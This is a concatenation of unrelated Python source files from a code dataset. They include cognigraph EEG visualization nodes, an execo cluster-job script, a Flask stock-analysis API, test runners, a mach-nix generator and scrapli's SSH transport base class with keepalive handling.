smoothing_matrix(sources_idx, adj_mat)\n sparse.save_npz(smoothing_matrix_file_path, smoothing_mat)\n return smoothing_mat\n\n def _start_gif(self):\n self._images = []\n self._gif_times = []\n self._gif_start_time = time.time()\n\n self.is_recording = True\n\n def _stop_gif(self):\n self.is_recording = False\n\n duration = time.time() - self._gif_start_time\n self._display_time = (duration * 1000) / len(self._images)\n\n def _save_gif(self, path):\n try:\n self._images[0].save(\n path,\n save_all=True,\n append_images=self._images[1:],\n duration=self._display_time,\n loop=0,\n )\n\n base, ext = os.path.splitext(path)\n times_savepath = base + \"_gif_times.txt\"\n with open(times_savepath, \"w\") as f:\n for t in self._gif_times:\n f.write(\"%1.3f\\n\" % t)\n except Exception as e:\n self._logger.exception(e)\n self._root._signal_sender.request_message.emit(\n \"Saving gif to %s failed!\" % path, str(e), \"error\"\n )\n\n def _append_screenshot(self):\n last_sample_time = self.traverse_back_and_find(\"timestamps\")[-1]\n self._gif_times.append(last_sample_time)\n self._images.append(im.fromarray(self.canvas.render()))\n\n\nclass SignalViewer(_WidgetOutput):\n CHANGES_IN_THESE_REQUIRE_RESET = ()\n\n UPSTREAM_CHANGES_IN_THESE_REQUIRE_REINITIALIZATION = (\"mne_info\",)\n 
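# Hedged note: SAVERS_FOR_UPSTREAM_MUTABLE_OBJECTS below appears to snapshot\n # mutable upstream attributes (here mne_info) through saver callables such as\n # channel_labels_saver, so the framework can compare hashable summaries when\n # deciding whether a reinitialisation is needed.\n 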
SAVERS_FOR_UPSTREAM_MUTABLE_OBJECTS = {\"mne_info\": channel_labels_saver}\n\n def __init__(self):\n super().__init__()\n self.widget = None\n\n def _initialize(self):\n self._signal_sender.init_widget_sig.emit()\n\n def _create_widget(self):\n mne_info = self.traverse_back_and_find(\"mne_info\")\n if mne_info[\"nchan\"]:\n return RawSignalViewer(\n fs=mne_info[\"sfreq\"],\n names=mne_info[\"ch_names\"],\n seconds_to_plot=10,\n )\n else:\n return RawSignalViewer(\n fs=mne_info[\"sfreq\"], names=[\"\"], seconds_to_plot=10\n )\n\n def _update(self):\n chunk = self.parent.output\n self._signal_sender.draw_sig.emit(chunk)\n\n def on_draw(self, chunk):\n QApplication.processEvents()\n if chunk.size:\n if TIME_AXIS == PYNFB_TIME_AXIS:\n self.widget.update(chunk)\n else:\n self.widget.update(chunk.T)\n\n def _on_critical_attr_change(self, key, old_val, new_val) -> bool:\n # Nothing to reset, really\n pass\n\n def _on_input_history_invalidation(self):\n # Doesn't really care, will draw anything\n pass\n\n def _check_value(self, key, value):\n # Nothing to be set\n pass\n\n\nclass FileOutput(OutputNode):\n\n CHANGES_IN_THESE_REQUIRE_RESET = (\"output_path\",)\n\n UPSTREAM_CHANGES_IN_THESE_REQUIRE_REINITIALIZATION = (\"mne_info\",)\n SAVERS_FOR_UPSTREAM_MUTABLE_OBJECTS = {\n \"mne_info\": lambda info: (info[\"sfreq\"],) + channel_labels_saver(info)\n }\n\n def _on_input_history_invalidation(self):\n pass\n\n def _check_value(self, key, value):\n pass # TODO: check that value as a string usable as a stream name\n\n def _on_critical_attr_change(self, key, old_val, new_val):\n self.initialize()\n\n def __init__(self, output_path=\"cognigraph_output.h5\"):\n OutputNode.__init__(self)\n self.output_path = output_path\n self._out_file = None\n self._disabled = True\n\n @property\n def disabled(self):\n return self._disabled\n\n @disabled.setter\n def disabled(self, value):\n pass\n\n def _initialize(self):\n if not self._disabled:\n self._logger.debug('Initializing.')\n self._logger.debug('Disabled = %s' % self._disabled)\n if self._out_file: # for resets\n self._out_file.close()\n\n info = self.traverse_back_and_find(\"mne_info\")\n col_size = info[\"nchan\"]\n self._out_file = tables.open_file(self.output_path, mode=\"w\")\n atom = tables.Float64Atom()\n\n self.output_array = self._out_file.create_earray(\n self._out_file.root, \"data\", atom, (col_size, 0)\n )\n self.timestamps_array = self._out_file.create_earray(\n self._out_file.root, \"timestamps\", atom, (1, 0)\n )\n self.ch_names = self._out_file.create_array(\n self._out_file.root,\n \"ch_names\",\n np.array(info[\"ch_names\"]),\n \"Channel names in data\",\n )\n self._out_file.root.data.attrs.sfreq = info[\"sfreq\"]\n try:\n fwd = self.traverse_back_and_find(\"_fwd\")\n self._out_file.create_array(\n self._out_file.root,\n \"src_xyz\",\n fwd['source_rr'],\n \"Source space coordinates\",\n )\n except Exception as e:\n self._logger.exception(e)\n self._logger.warning('Forward model not found.'\n ' Skip adding source coordinates.')\n\n def toggle(self):\n if self._disabled:\n self._start()\n else:\n self._stop()\n\n def _stop(self):\n self._out_file.close()\n self._disabled = True\n\n def _start(self):\n self._disabled = False\n self._initialize()\n\n def _update(self):\n data_chunk = self.parent.output\n timestamps = np.array(self.traverse_back_and_find(\"timestamps\"))[\n np.newaxis, :\n ]\n self.output_array.append(data_chunk)\n self.timestamps_array.append(timestamps)\n\n\nclass TorchOutput(OutputNode):\n\n CHANGES_IN_THESE_REQUIRE_RESET = 
()\n UPSTREAM_CHANGES_IN_THESE_REQUIRE_REINITIALIZATION = ()\n\n def _on_input_history_invalidation(self):\n pass\n\n def _check_value(self, key, value):\n pass # TODO: check that the value is a string usable as a stream name\n\n def _on_critical_attr_change(self, key, old_val, new_val) -> bool:\n pass\n\n def _initialize(self):\n pass\n\n def _update(self):\n import torch\n\n self.output = torch.from_numpy(self.parent.output)\n\n\nclass ConnectivityViewer(_WidgetOutput):\n \"\"\"Plot connectivity matrix on glass brain\"\"\"\n\n CHANGES_IN_THESE_REQUIRE_RESET = (\"n_lines\",)\n UPSTREAM_CHANGES_IN_THESE_REQUIRE_REINITIALIZATION = (\"mne_info\",)\n\n def __init__(self, n_lines=30):\n super().__init__()\n self._mesh = None\n self.widget = None\n self.s_obj = None\n self.c_obj = None\n self.view = None\n self.n_lines = n_lines\n\n def _initialize(self):\n self.mne_info = self.traverse_back_and_find(\"mne_info\")\n subject = self.traverse_back_and_find(\"subject\")\n subjects_dir = self.traverse_back_and_find(\"subjects_dir\")\n self.surfaces_dir = os.path.join(subjects_dir, subject)\n\n self._mesh = get_mesh_data_from_surfaces_dir(\n self.surfaces_dir, translucent=True\n )\n self._signal_sender.init_widget_sig.emit()\n\n def _update(self):\n input_data = np.abs(self.parent.output) # connectivity matrix\n # 1. Get the indices (i, j) of the n_lines strongest connections\n # get only off-diagonal elements\n l_triang = np.tril(input_data, k=-1)\n nl = self.n_lines\n n_ch = input_data.shape[0]\n nl_max = int(n_ch * (n_ch - 1) / 2)\n if nl > nl_max:\n nl = nl_max\n ii, jj = np.unravel_index(\n np.argpartition(-l_triang, nl, axis=None)[:nl], l_triang.shape\n )\n # 2. Get the corresponding vertex indices\n nodes_inds = np.unique(np.r_[ii, jj])\n labels = self.traverse_back_and_find(\"labels\")\n active_labels = [l for l in labels if l.is_active]\n nodes_inds_surf = np.array(\n [active_labels[i].mass_center for i in nodes_inds]\n )\n # 3. Get nodes = xyz of these vertices\n nodes = self._mesh._vertices[nodes_inds_surf]\n # 4. Edges are input data restricted to best n_lines nodes\n edges = input_data[nodes_inds[:, None], nodes_inds] # None needed\n 
# 5. Select = mask matrix with True in (i,j)-th positions\n select = np.zeros_like(input_data, dtype=bool)\n select[ii, jj] = True\n select = select[nodes_inds[:, None], nodes_inds]\n select += select.T\n nchan = self.mne_info[\"nchan\"]\n assert input_data.shape == (\n nchan,\n nchan,\n ), \"Number of channels doesn't conform to input data shape\"\n try:\n self.s_obj._sources.visible = False\n except Exception:\n pass\n try:\n self.c_obj._connect.visible = False\n except Exception:\n pass\n\n self.s_obj = SourceObj(\n \"sources\", nodes, color=\"#ab4642\", radius_min=20.0\n )\n\n self.c_obj = ConnectObj(\n \"default\",\n nodes,\n edges,\n select=select,\n line_width=2.0,\n cmap=\"Spectral_r\",\n color_by=\"strength\",\n )\n self._signal_sender.draw_sig.emit(None)\n\n def on_draw(self):\n self.view.add(self.s_obj._sources)\n self.view.add(self.c_obj._connect)\n\n def _on_critical_attr_change(self, key, old_val, new_val) -> bool:\n pass\n\n def _on_input_history_invalidation(self):\n pass\n\n def _check_value(self, key, value):\n pass\n\n def _create_widget(self):\n canvas = scene.SceneCanvas(keys=\"interactive\", show=False)\n self.canvas = canvas\n\n # Add a ViewBox to let the user zoom/rotate\n self.view = canvas.central_widget.add_view()\n self.view.camera = \"turntable\"\n self.view.camera.fov = 50\n self.view.camera.distance = 400\n # Make light follow the camera\n self._mesh.shared_program.frag[\"camtf\"] = self.view.camera.transform\n self.view.add(self._mesh)\n return canvas.native\n","sub_path":"cognigraph/nodes/outputs.py","file_name":"outputs.py","file_ext":"py","file_size_in_byte":21656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125326919","text":"#!/usr/bin/env python2\n\nimport sys\nimport os\nimport time\nimport ipdb\nimport traceback\nfrom shutil import copy\nfrom execo import Process, SshProcess, Remote, format_date, Put\nfrom execo_g5k import oarsub, oardel, OarSubmission, get_oar_job_nodes, wait_oar_job_start\nfrom execo_g5k.kadeploy import deploy, Deployment\nfrom execo_engine import Engine, logger, ParamSweeper, sweep\nfrom execo.report import Report\n\n# defined in __main__\n_site = None\n_nbrNodes = None\n_walltime = None\n_properties = None\n\nscript_path = os.path.dirname(os.path.realpath(__file__))\n\nclass ExecoWorkload(Engine):\n def setup_result_dir(self):\n self.result_dir = script_path + '/' + 'results_' + time.strftime(\"%Y-%m-%d--%H-%M-%S\")\n\n def run(self):\n # Go to the result folder before everything\n os.chdir(self.result_dir)\n\n jobs = [(_jobID, _site)] # NOTE: _jobID is never assigned in this script\n # Get nodes\n nodes = get_oar_job_nodes(_jobID, _site)\n\n try:\n logger.info(\"Creating hostfiles for all combinations...\")\n for nbr_node in _nbrNodes:\n hostfile_filename = self.result_dir + '/' + 'hostfile-' + nbr_node\n with open(hostfile_filename, 'w') as hostfile:\n for node in nodes[:int(nbr_node)]:\n print>>hostfile, node.address\n\n spack_process = Process('spack install -v chameleon@trunk+starpu+fxt ^starpu@svn-trunk+fxt') \n spack_process.start()\n spack_process.wait()\n spack_process.kill()\n\n finally:\n logger.info(\"Delete job: {}\".format(jobs))\n oardel(jobs)\n\nif __name__ == \"__main__\":\n _site = (sys.argv)[1]\n _nbrNodes = sys.argv[2].split(',') # assumed comma-separated node counts, e.g. '4,8'; iterating the raw string would yield single characters\n _walltime = (sys.argv)[3]\n _properties = (sys.argv)[4]\n\n execo = ExecoWorkload()\n 
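# Descriptive note (hedged, based on execo_engine defaults): Engine.start()\n # parses the engine options, creates the result directory declared in\n # setup_result_dir() above, and then invokes run().\n 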
execo.start()\n\n","sub_path":"Execo/execo.py","file_name":"execo.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"397862535","text":"#!/usr/bin/env python\n#-*-coding:utf8-*-\n'''\nAPI endpoints for data visualization\n'''\nfrom strategy import stockPoint\nfrom strategy import hongbao\nfrom dfbrain.helps import time\nfrom dfbrain.db import wind\nfrom dfbrain.db.test import timeStrategy\nfrom flask import Flask,send_file,jsonify,request\nfrom flask_cors import CORS # flask.ext.* was removed in Flask 1.0; import the extension package directly\nimport simplejson as json\nimport pandas as pd\napp = Flask(__name__)\nCORS(app)# allow cross-origin requests from browsers\n# build the base path\nimport os\nBASEPATH = os.path.dirname(os.path.abspath(__file__))\n\n@app.route('/index/point',methods=['GET'])\ndef getData():\n \"\"\"Fetch the tagged high/low points\n /index/point?ticker=&start=&end=\n args:\n * ticker: stock code (wind)\n * start: start date (e.g. 20150102)\n * end: end date (e.g. 20150201)\n returns:\n * all: all of the trading data\n * point: data tagging the highs/lows (1 = high, -1 = low)\n \"\"\"\n ticker = request.args.get('ticker','000001.SH')\n startDate = request.args.get('start', '19970101')# get the start-date parameter\n endDate = request.args.get('end',time.getTime(0,type='yyyymmdd'))# get the end-date parameter\n data = stockPoint.getPointData(ticker,startDate,endDate)# fetch the stock data\n stock = data[['TRADE_DT','S_DQ_OPEN','S_DQ_CLOSE','S_DQ_LOW','S_DQ_HIGH']]\n point = data[data['point']!=0][['TRADE_DT','S_DQ_HIGH']]\n trendPoint = data[(data['trend']!=1)&(data['trend']!=-1)][['TRADE_DT','S_DQ_HIGH']]\n return jsonify(postprocessor({'indexName':ticker,'all':stock.values.tolist(),'point':point.values.tolist(),'trend':trendPoint.values.tolist()}))\n\n@app.route('/index/cumpro',methods=['GET'])\ndef getcumPro():\n \"\"\"Fetch the cumulative probability distribution values\n /index/cumpro?ticker=&tag=&kind=\n args:\n * ticker: stock code (wind)\n * tag: type of the cumulative distribution (e.g. timeSpace)\n * kind: kind of the cumulative distribution\n returns:\n * tagName: name of the tag\n * tagData: the categories of that tag\n * cumPro: the cumulative probability for each subclass of the tag\n * current: the market's current position\n \"\"\"\n column = request.args.get('tag')# get the tag to analyse\n ticker = request.args.get('ticker','000001.SH')\n kind = request.args.get('kind','point')\n data = getPointData(ticker,'19970101',time.getTime(0,type='yyyymmdd'))\n if kind == 'point':\n analyseData = stockPoint.analyseSpace(data)# get the point-tagged data\n else:\n analyseData = stockPoint.analyseTrendSpace(data)# get the trend-tagged data\n pointList = analyseData[kind].values# type of the latest high/low point, or of the trend\n tagData,cumPro,currentData,currentCum = stockPoint.cumPro(analyseData,column,direction=pointList[len(pointList)-1],kind=kind)# get the probability density of the intensity\n return jsonify(postprocessor({'tagName':column,'tagData':tagData,'cumPro':cumPro,'currentData':str(currentData),'currentCum':currentCum}))# return two columns: the list and the probabilities\n\n@app.route('/index/intensity',methods=['GET'])\ndef getIntensity():\n \"\"\"Fetch the intensity values\n \"\"\"\n ticker = request.args.get('ticker','000001.SH')\n kind = request.args.get('kind','point')\n data = getPointData(ticker,'19970101',time.getTime(0,type='yyyymmdd'))\n if kind == 'point':\n analyseData = stockPoint.analyseSpace(data)# get the point-tagged data\n column = 'intensity'\n else:\n analyseData = stockPoint.analyseTrendSpace(data)# get the trend-tagged data\n column = 'trendIntensity'\n return jsonify(postprocessor({'intensity':analyseData[column].values.tolist(),'date':analyseData['TRADE_DT'].values.tolist()}))# return two columns: the list and the probabilities\n
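# Example requests (an illustrative sketch, assuming the Flask dev server\n# started below on its default 127.0.0.1:5000; parameters as documented in the\n# docstrings above):\n# curl 'http://127.0.0.1:5000/index/point?ticker=000001.SH&start=20150102&end=20150201'\n# curl 'http://127.0.0.1:5000/index/cumpro?ticker=000001.SH&tag=timeSpace&kind=point'\n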
@app.route('/ipfri',methods=['GET'])\ndef getIpfri():\n \"\"\"Show the comparison chart of IPFRI against an index\n /ipfri?key=&ticker=&start=&end=\n args:\n key: keyword of the database field\n ticker: the index to compare against\n start: start date\n end: end date\n return:\n ipfri: the IPFRI (eagle-eye) index values\n date: the dates\n closePrice: closing prices of the index\n ticker: name of the index\n \"\"\"\n key = request.args.get('key','IPFRI')# get the request parameters\n ticker = request.args.get('ticker','000001.SH')# the index to compare against\n startDate = request.args.get('start','20150401')# start date\n endDate = request.args.get('end',time.getTime(0,type='yyyymmdd'))# end date\n # fetch the IPFRI data\n t = timeStrategy()\n data = t.getAllData(startDate,endDate,key)\n # fetch the Hongbao data\n rateList = hongbao.upRate(data['confirm_date'].values.tolist(),5)\n # fetch the index's daily data\n index = wind.aindexeodprices()\n indexData = index.getIndexData(ticker,startDate,endDate)\n return jsonify(postprocessor({'ipfri':data[key].values.tolist(),'date':data['confirm_date'].values.tolist(),'closePrice':indexData[['S_DQ_OPEN','S_DQ_CLOSE','S_DQ_LOW','S_DQ_HIGH']].values.tolist(),'ticker':ticker,'hongbao':rateList}))\n################################################################################\n# Helper functions\n################################################################################\ndef index_ipfri():\n key = 'IPFRI'\n ticker = '000001.SH'\n startDate = '20160401'\n endDate = time.getTime(0,type='yyyymmdd')\n # fetch the IPFRI data\n t = timeStrategy()\n data = t.getAllData(startDate,endDate,key)\n # fetch the index's daily data\n index = wind.aindexeodprices()\n indexData = index.getIndexData(ticker,startDate,endDate)\n indexData[key] = [0 for i in range(0,len(indexData.values))]\n for i in range(0,len(indexData.values)):\n current_index = indexData.index[i]\n tradeDate = indexData['TRADE_DT'][i]# the trading day\n indexData.loc[current_index,key] = data[data['confirm_date']==tradeDate][key].values[0]# assign the value\n return indexData\n\ndef getPointData(ticker,startDate,endDate):\n \"\"\"\n Load the data from file; if the file does not exist, generate it first\n \"\"\"\n filename = os.path.join(BASEPATH,'strategy/data/'+ticker+'.csv')\n if os.path.exists(filename):\n data = pd.read_csv(filename)\n else:\n data = stockPoint.tagTrend(stockPoint.generatePoint(ticker))\n stockPoint.saveData(data,ticker)\n return data[(data['tradeday_int']>=int(startDate))&(data['tradeday_int']<=int(endDate))]\ndef postprocessor(data):\n \"\"\"\n JSON-ify the data\n \"\"\"\n json.dumps(data, use_decimal=True)\n return data\n\nif __name__ == '__main__':\n from werkzeug.middleware.proxy_fix import ProxyFix # werkzeug.contrib was removed in Werkzeug 1.0\n app.wsgi_app = ProxyFix(app.wsgi_app)\n app.debug = True\n app.run()\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"486180834","text":"#!/usr/local/bin/python3\nimport os\nimport sys\nimport subprocess\n\n\ndef test_XCEC(exePath, smt='stp', increment = False, root='./', output='./output/'):\n print(\"The prover is\", smt)\n files = os.listdir(os.path.join(root, 'cases'))\n files.sort(key= lambda x:int(x[4:]))\n if not os.path.exists(os.path.join(root, 'log')):\n os.mkdir(os.path.join(root, 'log'))\n for i, dir in enumerate(files):\n with open(os.path.join(root, 'log/'+dir+'.txt'), 'w', encoding='utf8') as log:\n cmd = [exePath, os.path.join(root, 'cases', dir, 'gf.v'), os.path.join(root, 'cases', dir, 'rf.v'), \n os.path.join(output, 'output_' + dir + '.txt'), smt, 'i' if increment else 'u']\n p = subprocess.Popen(cmd, shell=False, bufsize=0,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n while p.poll() is None:\n nextline = p.stdout.readline()\n log.write(nextline.decode())\n log.flush()\n if p.returncode == 0:\n print(dir + ' success!')\n else:\n print(dir + ' failed!')\n\nif __name__ == \"__main__\":\n smt = 'stp'\n increment = False\n if len(sys.argv) >= 2:\n smt = sys.argv[1]\n if len(sys.argv) >= 3:\n increment = sys.argv[2][0] == 'i'\n test_XCEC('../build/XCEC', smt, 
increment)\n","sub_path":"test/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"116692267","text":"import os\nimport sys\n\nfrom mach_nix.data.data_interface import NixpkgsDirectory, DependencyDB\nfrom mach_nix.generators.overlay_generator import OverlaysGenerator\nfrom mach_nix.requirements import parse_reqs\nfrom mach_nix.resolver.resolvelib_resolver import ResolvelibResolver\nfrom mach_nix.versions import PyVer\n\n\ndef load_env(name, *args, **kwargs):\n var = os.environ.get(name, *args, **kwargs)\n if var is None:\n print(f'Error: env variable \"{name}\" must not be empty', file=sys.stderr)\n exit(1)\n return var.strip()\n\n\ndef main():\n disable_checks = load_env('disable_checks')\n nixpkgs_commit = load_env('nixpkgs_commit')\n nixpkgs_tarball_sha256 = load_env('nixpkgs_tarball_sha256')\n nixpkgs_json = load_env('nixpkgs_json')\n out_file = load_env('out_file')\n py_ver_str = load_env('py_ver_str')\n prefer_nixpkgs = load_env('prefer_nixpkgs')\n pypi_deps_db_data_dir = load_env('pypi_deps_db_data_dir')\n pypi_fetcher_commit = load_env('pypi_fetcher_commit')\n pypi_fetcher_tarball_sha256 = load_env('pypi_fetcher_tarball_sha256')\n requirements = load_env('requirements')\n\n py_ver = PyVer(py_ver_str)\n nixpkgs = NixpkgsDirectory(nixpkgs_json)\n deps_db = DependencyDB(py_ver, pypi_deps_db_data_dir)\n generator = OverlaysGenerator(\n py_ver,\n nixpkgs_commit,\n nixpkgs_tarball_sha256,\n nixpkgs,\n pypi_fetcher_commit,\n pypi_fetcher_tarball_sha256,\n disable_checks,\n ResolvelibResolver(nixpkgs, deps_db),\n prefer_nixpkgs=prefer_nixpkgs,\n )\n reqs = parse_reqs(requirements)\n expr = generator.generate(reqs)\n with open(out_file, 'w') as f:\n f.write(expr)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"mach_nix/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"543618382","text":"import pandas\nfrom pandas import DataFrame\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error, r2_score\nimport numpy as np\n\ndatos = pandas.read_csv('data/problema_3.csv')\ndf = DataFrame(datos)\n\nx = df[['manual']] # independent variable(s)\ny = df['automática'] # dependent variable (column name kept as in the CSV)\nnitrato = 100\n\nlineal = linear_model.LinearRegression()\nlineal.fit(x, y)\n\ny_adjusted = lineal.predict(x)\ny_predicted = lineal.predict([[nitrato]])\n\nrmse = np.sqrt(mean_squared_error(y, y_adjusted))\nr2 = r2_score(y, y_adjusted)\n\nprint(f'Regression result: {round(y_predicted[0], 2)}')\nprint(f'R2: {round(r2, 2)}')\nprint(f'Mean error: ±{round(rmse, 2)}')\n\n","sub_path":"problema_3.py","file_name":"problema_3.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"294123060","text":"import unittest\n\nfrom autocompleteSystem.autocomplete import autocomplete\n\n\nclass MyTestCase(unittest.TestCase):\n def test1(self):\n s = \"de\"\n queries = [\"dog\", \"deer\", \"deal\"]\n\n expected = {\"deer\", \"deal\"}\n actual = set(autocomplete(s, queries))\n self.assertEqual(expected, actual)\n\n\nif __name__ == '__main__':\n 
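# autocomplete(s, queries) is expected to return the queries that extend the\n # prefix s; order is not asserted above, hence the set() comparison.\n 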
unittest.main()\n","sub_path":"autocompleteSystem/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"304472406","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"brudercropper\",\n version=\"0.1.6\",\n author=\"Niggo\",\n description=\"Crops stuff to 62mm for Brother label printers\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=setuptools.find_packages(),\n install_requires=[\n \"imutils==0.5.3\",\n \"numpy==1.18.2\",\n \"opencv-python==4.2.0.34\",\n \"Pillow==7.1.1\",\n \"pytesseract==0.3.3\",\n \"python-barcode==0.11.0\"\n ],\n classifiers=[\n # \"Development Status :: 3 - Alpha\"\n \"Programming Language :: Python :: 3\",\n # \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.5',\n entry_points={\n 'console_scripts': [\n 'brudercrop = brudercropper.crop:main',\n ],\n }\n)","sub_path":"pypi_install_script/brudercropper-0.1.6.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"116298423","text":"\"\"\"scrapli.transport.transport\"\"\"\nimport time\nfrom abc import ABC, abstractmethod\nfrom concurrent.futures import ThreadPoolExecutor\nfrom datetime import datetime\nfrom logging import getLogger\nfrom threading import Lock\nfrom typing import Optional\n\nfrom scrapli.exceptions import ScrapliKeepaliveFailure\n\nLOG = getLogger(\"transport\")\n\n\nclass Transport(ABC):\n def __init__(\n self,\n host: str = \"\",\n port: int = 22,\n timeout_socket: int = 5,\n timeout_transport: int = 5,\n timeout_exit: bool = True,\n keepalive: bool = False,\n keepalive_interval: int = 30,\n keepalive_type: str = \"network\",\n keepalive_pattern: str = \"\\005\",\n ) -> None:\n \"\"\"\n Transport Base Object\n\n Args:\n host: host ip/name to connect to\n port: port to connect to\n timeout_socket: timeout for establishing socket in seconds\n timeout_transport: timeout for ssh|telnet transport in seconds\n timeout_exit: True/False close transport if timeout encountered. If False and keepalives\n are in use, keepalives will prevent program from exiting so you should be sure to\n catch Timeout exceptions and handle them appropriately\n keepalive: whether or not to try to keep session alive\n keepalive_interval: interval to use for session keepalives\n keepalive_type: network|standard -- 'network' sends actual characters over the\n transport channel. This is useful for network-y type devices that may not support\n 'standard' keepalive mechanisms. 'standard' attempts to use whatever 'standard'\n keepalive mechanisms are available in the selected transport mechanism. Check the\n transport documentation for details on what is supported and/or how it is\n implemented for any given transport driver\n keepalive_pattern: pattern to send to keep network channel alive. Default is\n u'\\005' which is equivalent to 'ctrl+e'. This pattern moves cursor to end of the\n line which should be an innocuous pattern. This will only be entered *if* a lock\n can be acquired. 
This is only applicable if using keepalives and if the keepalive\n type is 'network'\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n self.host: str = host\n self.port: int = port\n self.timeout_socket: int = timeout_socket\n self.timeout_transport: int = timeout_transport\n self.timeout_exit: bool = timeout_exit\n self.keepalive: bool = keepalive\n self.keepalive_interval: int = keepalive_interval\n self.keepalive_type: str = keepalive_type\n self.keepalive_pattern: str = keepalive_pattern\n\n self.session_lock: Lock = Lock()\n\n def __bool__(self) -> bool:\n \"\"\"\n Magic bool method for Socket\n\n Args:\n N/A\n\n Returns:\n bool: True/False if socket is alive or not\n\n Raises:\n N/A\n\n \"\"\"\n return self.isalive()\n\n def __str__(self) -> str:\n \"\"\"\n Magic str method for Transport\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n return f\"Transport Object for host {self.host}\"\n\n def __repr__(self) -> str:\n \"\"\"\n Magic repr method for Transport\n\n Args:\n N/A\n\n Returns:\n str: repr for class object\n\n Raises:\n N/A\n\n \"\"\"\n class_dict = self.__dict__.copy()\n class_dict[\"auth_password\"] = \"********\"\n return f\"Transport {class_dict}\"\n\n @abstractmethod\n def open(self) -> None:\n \"\"\"\n Open channel, acquire pty, request interactive shell\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n\n @abstractmethod\n def close(self) -> None:\n \"\"\"\n Close session and socket\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n\n @abstractmethod\n def isalive(self) -> bool:\n \"\"\"\n Check if socket is alive and session is authenticated\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n\n @abstractmethod\n def read(self) -> bytes:\n \"\"\"\n Read data from the channel\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n\n @abstractmethod\n def write(self, channel_input: str) -> None:\n \"\"\"\n Write data to the channel\n\n Args:\n channel_input: string to send to channel\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n\n @abstractmethod\n def set_timeout(self, timeout: Optional[int] = None) -> None:\n \"\"\"\n Set session timeout\n\n Args:\n timeout: timeout in seconds\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n\n def _session_keepalive(self) -> None:\n \"\"\"\n Spawn keepalive thread for transport session\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n if not self.keepalive:\n return\n pool = ThreadPoolExecutor()\n if self.keepalive_type == \"network\":\n pool.submit(self._keepalive_network)\n else:\n pool.submit(self._keepalive_standard)\n\n def _keepalive_network(self) -> None:\n \"\"\"\n Send \"in band\" keepalives to devices.\n\n Generally used with \"network\" devices which do not have native keepalive support. 
This will\n try to acquire a session lock and send an innocuous character -- such as CTRL+E -- to keep\n the device \"exec-timeout\" (in network-y words) from expiring.\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n ScrapliKeepaliveFailure: if scrapli cant unlock and send keepalive in less than 3 *\n the keepalive_interval\n\n \"\"\"\n lock_counter = 0\n last_keepalive = datetime.now()\n while True:\n if not self.isalive():\n return\n diff = datetime.now() - last_keepalive\n if diff.seconds >= self.keepalive_interval:\n if not self.session_lock.locked():\n LOG.debug(\n f\"Sending 'network' keepalive with pattern {repr(self.keepalive_pattern)}.\"\n )\n lock_counter = 0\n self.session_lock.acquire()\n self.write(self.keepalive_pattern)\n self.session_lock.release()\n last_keepalive = datetime.now()\n else:\n lock_counter += 1\n if lock_counter >= 3:\n LOG.info(f\"Keepalive thread missed {lock_counter} consecutive keepalives.\")\n if diff.seconds > self.keepalive_interval * 3:\n msg = (\n \"Keepalive thread has failed to send a keepalive in greater than three \"\n \"times the keepalive interval!\"\n )\n LOG.critical(msg)\n raise ScrapliKeepaliveFailure(msg)\n time.sleep(self.keepalive_interval / 10)\n\n @abstractmethod\n def _keepalive_standard(self) -> None:\n \"\"\"\n Send \"out of band\" (protocol level) keepalives to devices.\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n","sub_path":"scrapli/transport/transport.py","file_name":"transport.py","file_ext":"py","file_size_in_byte":7934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"371367731","text":"import logging\n\nfrom django.conf import settings\nfrom django.db.models.functions import Concat\nfrom django.db.models import Count, F, Value, CharField\nfrom django.http.response import FileResponse\nfrom rest_framework import status, viewsets, mixins, filters\nfrom rest_framework.decorators import action\nfrom rest_framework.parsers import MultiPartParser\nfrom rest_framework.response import Response\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom filters.mixins import FiltersMixin\n\nfrom server.pj.email_service import 